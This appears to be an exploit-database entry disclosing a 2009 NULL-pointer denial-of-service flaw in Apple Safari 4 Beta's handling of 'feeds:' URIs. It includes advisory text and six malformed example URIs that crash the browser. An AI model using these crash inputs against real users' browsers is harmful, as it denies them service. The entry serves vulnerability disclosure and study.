EXPLOITS

Apple Safari 4 - 'feeds:' URI Null Pointer Dereference Remote Denial of Service

Author: Trancer
type: dos
platform: osx
port: 
date_added: 2009-02-25  
date_updated: 2014-04-11  
verified: 1  
codes: CVE-2009-0744;OSVDB-52898  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 32817.txt  

source: https://www.securityfocus.com/bid/33909/info

Apple Safari is prone to a denial-of-service vulnerability that stems from a NULL-pointer dereference.

Attackers can exploit this issue to crash the affected application, denying service to legitimate users.

Apple Safari 4 Beta is vulnerable; other versions may also be affected.

The following example URIs are available:

feeds:%&www.example.com/feed/
feeds:{&www.example.com/feed/
feeds:}&www.example.com/feed/
feeds:^&www.example.com/feed/
feeds:`&www.example.com/feed/
feeds:|&www.example.com/feed/